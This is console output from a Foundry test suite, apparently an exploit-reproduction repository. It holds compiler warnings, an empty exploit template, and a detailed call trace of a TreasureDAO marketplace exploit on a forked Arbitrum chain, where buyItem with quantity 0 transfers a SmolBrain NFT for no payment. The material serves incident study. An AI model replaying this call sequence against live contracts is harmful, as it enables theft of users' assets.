Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 887.00ms
Solc 0.8.10 finished in 1.04s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    â”œâ”€ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    â”‚   â””â”€ â† [Return] 0
    â””â”€ â† [Stop]

  [23756] ExploitScript::testExploit()
    â”œâ”€ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    â”‚   â””â”€ â† [Return]
    â”œâ”€ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    â”œâ”€ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    â””â”€ â† [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 680.95ms (1.90ms CPU time)
[2m2025-02-22T00:25:18.852378Z[0m [31mERROR[0m [2msharedbackend[0m[2m:[0m Failed to send/recv `storage` [3merr[0m[2m=[0mfailed to get storage for 0x7109709ECfa91a80626fF3989D68f67F5b1DD12D at 46308022326495007027972728677917914892729792999299745830475596687180801507328: error sending request for url (https://rpc.ankr.com/arbitrum); operation timed out [3maddress[0m[2m=[0m0x7109709ECfa91a80626fF3989D68f67F5b1DD12D [3mindex[0m[2m=[0m46308022326495007027972728677917914892729792999299745830475596687180801507328

Ran 1 test for src/test/2022-03/TreasureDAO_exp.sol:ContractTest
[PASS] testExploit() (gas: 339919)
Logs:
  Original NFT owner of SmolBrain:: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165
  Exploit completed, NFT owner of SmolBrain:: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496

Traces:
  [5795] ContractTest::setUp()
    â”œâ”€ [0] VM::createSelectFork("arbitrum", 7322694 [7.322e6])
    â”‚   â””â”€ â† [Return] 0
    â””â”€ â† [Stop]

  [392119] ContractTest::testExploit()
    â”œâ”€ [2668] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::ownerOf(3557) [staticcall]
    â”‚   â””â”€ â† [Return] 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165
    â”œâ”€ emit log_named_address(key: "Original NFT owner of SmolBrain:", val: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165)
    â”œâ”€ [347059] 0x812cdA2181ed7c45a35a691E0C85E231D218E273::buyItem(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0, 6969000000000000000000 [6.969e21])
    â”‚   â”œâ”€ [7061] 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee::listings(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165) [staticcall]
    â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000179ca4da0a7d14400000000000000000000000000000000000000000000000000000000017ee748ff2c
    â”‚   â”œâ”€ [2350] 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee::paymentToken() [staticcall]
    â”‚   â”‚   â””â”€ â† [Return] 0x000000000000000000000000539bde0d7dbd336b79148aa742883198bbf60342
    â”‚   â”œâ”€ [22271] 0x539bdE0d7Dbd336b79148AA742883198BBF60342::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0)
    â”‚   â”‚   â”œâ”€ [2337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    â”‚   â”‚   â”œâ”€ [12128] 0x3f770Ac673856F105b586bb393d122721265aD46::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0) [delegatecall]
    â”‚   â”‚   â”‚   â”œâ”€ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, value: 0)
    â”‚   â”‚   â”‚   â”œâ”€ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, value: 0)
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”œâ”€ [350] 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee::paymentToken() [staticcall]
    â”‚   â”‚   â””â”€ â† [Return] 0x000000000000000000000000539bde0d7dbd336b79148aa742883198bbf60342
    â”‚   â”œâ”€ [5802] 0x539bdE0d7Dbd336b79148AA742883198BBF60342::approve(0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0)
    â”‚   â”‚   â”œâ”€ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    â”‚   â”‚   â”œâ”€ [4662] 0x3f770Ac673856F105b586bb393d122721265aD46::approve(0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0) [delegatecall]
    â”‚   â”‚   â”‚   â”œâ”€ emit Approval(owner: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, spender: 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, value: 0)
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”œâ”€ [224098] 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee::buyItem(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0)
    â”‚   â”‚   â”œâ”€ [632] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::supportsInterface(0x80ac58cd) [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â”œâ”€ [668] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::ownerOf(3557) [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165
    â”‚   â”‚   â”œâ”€ [632] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::supportsInterface(0x80ac58cd) [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â”œâ”€ [127843] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::safeTransferFrom(0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 3557)
    â”‚   â”‚   â”‚   â”œâ”€ [2538] 0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509::isAtSchool(3557) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”‚   â”œâ”€ [8113] 0xCca920553ccc9aca80919e614325167d9Ec37b4A::tokenOfOwnerByIndex(0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ [2657] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::balanceOf(0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”‚   â”œâ”€ [31747] 0xCca920553ccc9aca80919e614325167d9Ec37b4A::upgradeSafe(0)
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ [2338] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::totalSupply() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 4294
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ [27839] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::upgradeSafe(0)
    â”‚   â”‚   â”‚   â”‚   â”‚   â”œâ”€ [2723] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::balanceOf(0x59D16389335147E034aA1238cA043Cba907f79Dd) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0
    â”‚   â”‚   â”‚   â”‚   â”‚   â”œâ”€ [12303] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::averageIQ() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â”œâ”€ [9101] 0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509::totalIQ() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x00000000000000000000000000000000000000000005712901ea29294f3ebab4
    â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x00000000000000000000000000000000000000000000001dff8c484f43bf78eb
    â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”‚   â”œâ”€ emit Approval(owner: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, approved: 0x0000000000000000000000000000000000000000, tokenId: 3557)
    â”‚   â”‚   â”‚   â”œâ”€ emit Transfer(from: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, to: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, tokenId: 3557)
    â”‚   â”‚   â”‚   â”œâ”€ [927] 0x812cdA2181ed7c45a35a691E0C85E231D218E273::onERC721Received(0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 3557, 0x)
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x150b7a02
    â”‚   â”‚   â”‚   â”œâ”€  storage changes:
    â”‚   â”‚   â”‚   â”‚   @ 0x117c4475817562a58ec83ee0f1053584f1a51be1a922837c4ec447763dee0716: 3557 â†’ 0
    â”‚   â”‚   â”‚   â”‚   @ 0x284fe5fa7fe7498ec95892d8a9cb787ed1b6e09470f2e1c335b8fe5cd940ff5f: 0x00000000000000000000000052b24becae3fa1036ca0e956cd987d48a8f0e165 â†’ 0x000000000000000000000000812cda2181ed7c45a35a691e0c85e231d218e273
    â”‚   â”‚   â”‚   â”‚   @ 0x9bdbeeb2a3d85886c31c6dc98788cb55658a8eabf0c1310a9d5dcbb0fe3a51ae: 0 â†’ 1
    â”‚   â”‚   â”‚   â”‚   @ 0xe5a1becfa46410e8106e95d597debb11ddf09775b5e9a5dd7c8ce1bb2fc4e0e9: 0 â†’ 3557
    â”‚   â”‚   â”‚   â”‚   @ 0xdcad997cd8e6acc8dfb90f1b906ec211cdfca5098f97be510510fbe14dc5733b: 1 â†’ 0
    â”‚   â”‚   â”‚   â””â”€ â† [Stop]
    â”‚   â”‚   â”œâ”€ emit ItemSold(: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, : 0x812cdA2181ed7c45a35a691E0C85E231D218E273, : 0x6325439389E0797Ab35752B4F43a14C004f22A9c, : 3557, : 0, : 6969000000000000000000 [6.969e21])
    â”‚   â”‚   â”œâ”€ [49236] 0xb40BC8bF5f4dF00B0b32C56E8d3Ecd802656cCe4::reportSale(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x539bdE0d7Dbd336b79148AA742883198BBF60342, 6969000000000000000000 [6.969e21])
    â”‚   â”‚   â”‚   â”œâ”€ emit PriceUpdate(param0: 0x6325439389E0797Ab35752B4F43a14C004f22A9c, param1: 477322193002434434342397814992046308891884389186 [4.773e47], param2: 0x0000000000000000000000000000000000000dE5, param3: 6969000000000000000000 [6.969e21])
    â”‚   â”‚   â”‚   â”œâ”€  storage changes:
    â”‚   â”‚   â”‚   â”‚   @ 0x07407384436a4f8c47f29af7baab762f37f0464e563950bef2ce90838728218b: 0 â†’ 0x000000000000000000000000539bde0d7dbd336b79148aa742883198bbf60342
    â”‚   â”‚   â”‚   â”‚   @ 0x07407384436a4f8c47f29af7baab762f37f0464e563950bef2ce90838728218a: 0 â†’ 0x000000000000000000000000000000000000000000000179ca4da0a7d1440000
    â”‚   â”‚   â”‚   â””â”€ â† [Stop]
    â”‚   â”‚   â”œâ”€ [9271] 0x539bdE0d7Dbd336b79148AA742883198BBF60342::transferFrom(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0xDb6Ab450178bAbCf0e467c1F3B436050d907E233, 0)
    â”‚   â”‚   â”‚   â”œâ”€ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    â”‚   â”‚   â”‚   â”œâ”€ [8128] 0x3f770Ac673856F105b586bb393d122721265aD46::transferFrom(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0xDb6Ab450178bAbCf0e467c1F3B436050d907E233, 0) [delegatecall]
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ emit Transfer(from: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, to: 0xDb6Ab450178bAbCf0e467c1F3B436050d907E233, value: 0)
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ emit Approval(owner: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, spender: 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, value: 0)
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â”œâ”€ [9271] 0x539bdE0d7Dbd336b79148AA742883198BBF60342::transferFrom(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0)
    â”‚   â”‚   â”‚   â”œâ”€ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    â”‚   â”‚   â”‚   â”œâ”€ [8128] 0x3f770Ac673856F105b586bb393d122721265aD46::transferFrom(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0) [delegatecall]
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ emit Transfer(from: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, to: 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, value: 0)
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ emit Approval(owner: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, spender: 0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, value: 0)
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”‚   â””â”€ â† [Stop]
    â”‚   â”œâ”€ [632] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::supportsInterface(0x80ac58cd) [staticcall]
    â”‚   â”‚   â””â”€ â† [Return] true
    â”‚   â”œâ”€ [69979] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::safeTransferFrom(0x812cdA2181ed7c45a35a691E0C85E231D218E273, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3557)
    â”‚   â”‚   â”œâ”€ [538] 0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509::isAtSchool(3557) [staticcall]
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”œâ”€ [3613] 0xCca920553ccc9aca80919e614325167d9Ec37b4A::tokenOfOwnerByIndex(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0) [staticcall]
    â”‚   â”‚   â”‚   â”œâ”€ [2657] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::balanceOf(0x812cdA2181ed7c45a35a691E0C85E231D218E273) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”œâ”€ [7747] 0xCca920553ccc9aca80919e614325167d9Ec37b4A::upgradeSafe(0)
    â”‚   â”‚   â”‚   â”œâ”€ [338] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::totalSupply() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 4294
    â”‚   â”‚   â”‚   â”œâ”€ [5839] 0xd666d1CC3102cd03e07794A61E5F4333B4239F53::upgradeSafe(0)
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ [723] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::balanceOf(0x59D16389335147E034aA1238cA043Cba907f79Dd) [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0
    â”‚   â”‚   â”‚   â”‚   â”œâ”€ [2303] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::averageIQ() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â”œâ”€ [1101] 0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509::totalIQ() [staticcall]
    â”‚   â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x00000000000000000000000000000000000000000005712901ea29294f3ebab4
    â”‚   â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x00000000000000000000000000000000000000000000001dff8c484f43bf78eb
    â”‚   â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    â”‚   â”‚   â”œâ”€ emit Approval(owner: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, approved: 0x0000000000000000000000000000000000000000, tokenId: 3557)
    â”‚   â”‚   â”œâ”€ emit Transfer(from: 0x812cdA2181ed7c45a35a691E0C85E231D218E273, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], tokenId: 3557)
    â”‚   â”‚   â”œâ”€ [1803] ContractTest::onERC721Received(0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 3557, 0x)
    â”‚   â”‚   â”‚   â””â”€ â† [Return] 0x150b7a02
    â”‚   â”‚   â”œâ”€  storage changes:
    â”‚   â”‚   â”‚   @ 0xe5a1becfa46410e8106e95d597debb11ddf09775b5e9a5dd7c8ce1bb2fc4e0e9: 3557 â†’ 0
    â”‚   â”‚   â”‚   @ 0x9bdbeeb2a3d85886c31c6dc98788cb55658a8eabf0c1310a9d5dcbb0fe3a51ae: 1 â†’ 0
    â”‚   â”‚   â”‚   @ 0x284fe5fa7fe7498ec95892d8a9cb787ed1b6e09470f2e1c335b8fe5cd940ff5f: 0x000000000000000000000000812cda2181ed7c45a35a691e0c85e231d218e273 â†’ 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    â”‚   â”‚   â”‚   @ 0x93ddb050f4765c302625485e714a8c927b92c259399c227557271c104da0bc2e: 0 â†’ 3557
    â”‚   â”‚   â”‚   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 â†’ 1
    â”‚   â”‚   â””â”€ â† [Stop]
    â”‚   â””â”€ â† [Stop]
    â”œâ”€ [668] 0x6325439389E0797Ab35752B4F43a14C004f22A9c::ownerOf(3557) [staticcall]
    â”‚   â””â”€ â† [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    â”œâ”€ emit log_named_address(key: "Exploit completed, NFT owner of SmolBrain:", val: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    â”œâ”€  storage changes:
    â”‚   @ 34: 0 â†’ 0x00000000000000000000000052b24becae3fa1036ca0e956cd987d48a8f0e165
    â””â”€ â† [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 80.38s (33.34s CPU time)

Ran 2 test suites in 81.49s (81.06s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
